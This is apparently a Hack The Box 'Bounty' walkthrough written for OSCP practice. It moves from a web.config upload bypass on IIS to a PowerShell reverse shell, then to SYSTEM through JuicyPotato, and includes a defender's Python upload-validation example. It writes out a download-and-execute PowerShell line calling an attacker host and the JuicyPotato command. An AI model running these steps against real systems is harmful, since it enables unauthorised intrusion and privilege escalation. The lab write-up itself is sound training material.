OSCP PREPARATIONS – HTB Bounty

Bounty is a deliberately vulnerable Windows machine among the retired Hack The Box machines; the goal is to obtain the user and root flags by exploiting its vulnerabilities.
We perform a network scan with nmap to identify the target machine's open ports and services.
Classic Scan

Full port scan

As a result of the network scan, we find that port "80/tcp http Microsoft IIS httpd 7.5" is open.
We enumerate this port.

We do not find any useful information in the web interface or in the page source, so we scan with gobuster to detect hidden files and directories.

The file and directory scan finds /aspnet_client, /transfer.aspx and /uploadedfiles.
/uploadedfiles/ and /aspnet_client cannot be browsed (no permission).

We go to /transfer.aspx.

We try to upload a file here, and the .aspx file extension is not allowed.

Uploading a .png file is accepted.

Let's check whether we can access the uploaded file.

We are able to access the file we uploaded.
Now let's intercept the upload request with Burp Suite to see which file types are accepted and check whether there is a bypass. If we can somehow upload a file containing ASPX code to the web server, we can execute it by requesting the file from the uploadedfiles directory.
I tested the ASP and ASPX extensions, but both give me an "invalid file" error.
On IIS servers, .config files are important. When I tried this here it was accepted, so we look for a .config reverse shell file.
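As an added illustration (not code from the original writeup or from Hack The Box), here is a Python reconstruction of the kind of extension denylist the upload form behaves like, next to an allowlist check that also refuses web.config, plus an audit helper a defender can run over the uploads directory; the extension sets and function names are assumptions.

```python
import os

# Assumed reconstruction of the weak check: only .asp and .aspx are refused,
# so web.config (which IIS honours inside the upload directory) slips through.
DENYLIST = {".asp", ".aspx"}

# Hardened replacement: a short allowlist of image extensions only.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}

# Extensions IIS/ASP.NET maps to handlers; none of these belong in an upload folder.
SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx", ".config"}


def denylist_accepts(filename: str) -> bool:
    """Weak check as observed on Bounty: refuse listed extensions, accept everything else."""
    return os.path.splitext(filename)[1].lower() not in DENYLIST


def allowlist_accepts(filename: str) -> bool:
    """Hardened check: plain basename, exactly one extension, and it must be allowlisted."""
    if filename != os.path.basename(filename) or "\\" in filename:
        return False                      # path separators / traversal in the name
    if filename in ("", ".", ".."):
        return False
    stem, ext = os.path.splitext(filename)
    if ext.lower() not in ALLOWLIST:
        return False                      # rejects .aspx, .config and anything unlisted
    if not stem or "." in stem:
        return False                      # rejects ".png" and shell.aspx.png
    return True


def audit_uploads(filenames):
    """Detection side: list upload-directory entries that IIS could execute or honour."""
    findings = []
    for name in filenames:
        base = os.path.basename(name)
        if base.lower() == "web.config":
            findings.append((base, "IIS configuration file"))
        elif os.path.splitext(base)[1].lower() in SCRIPT_EXTS:
            findings.append((base, "server-side script"))
    return findings


if __name__ == "__main__":
    # Constructed sample names, not files taken from the machine.
    for name in ("photo.png", "shell.aspx", "web.config", "shell.aspx.png"):
        print(f"{name:16} denylist={denylist_accepts(name)!s:5} allowlist={allowlist_accepts(name)}")
    print(audit_uploads(["photo.png", "web.config", "x.aspx"]))
```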

We download and modify this code.

Then we host Invoke-PowerShellTcp.ps1 on a web server so the target can download it, and we listen with nc.

The file uploaded successfully. I start listening on the port with nc before browsing to the web.config file.

This way we get a shell as the bounty\merlin user on the target.
Here we see that the Desktop directory appears empty; we check for hidden files with the attrib command and find the user flag.

After getting the user flag, we try to access the Administrator user's files, but we cannot because we do not have the authorization.
We perform local enumeration to find a way to root (SYSTEM) privileges.

Here we see that the kernel is old and that SeImpersonatePrivilege is enabled. We think of using Rotten Potato, so we go and download it from GitHub.
Accounts running the SQL Server service or the IIS service usually have this privilege enabled by design. It is intended to allow a service to impersonate other users on the system. Juicy Potato takes advantage of the way Microsoft handles tokens to elevate local privileges to SYSTEM.
https://github.com/ohpe/juicy-potato/releases/tag/v0.1
After downloading JuicyPotato.exe from GitHub, we transfer it to the target machine.

JuicyPotato.exe requires 3 mandatory parameters.
We will focus on the -p parameter, which should give us a reverse shell. Here I create a file called shell.bat that should give us a reverse shell, so you should download Invoke-PowerShellTcp.ps1 and use it.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1')"

We send this bat file to the target machine.

Now that we have transferred the shell.bat file, it is time to use JuicyPotato.exe to give us the shell.
.\JuicyPotato.exe -t * -p shell.bat -l 4444 -c '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}'
We use -t * to cover all process-creation options, -p to run shell.bat, -l for the local listening port, and -c to supply the Windows Server 2008 R2 Enterprise CLSID value.
We can find the CLSID value at https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise.

Before running this command, we start the web server on our local machine so that Invoke-PowerShellTcp.ps1 can be downloaded and run, and we listen with nc.

After running the command we get a shell as nt authority\system.

And that's how we get the root flag.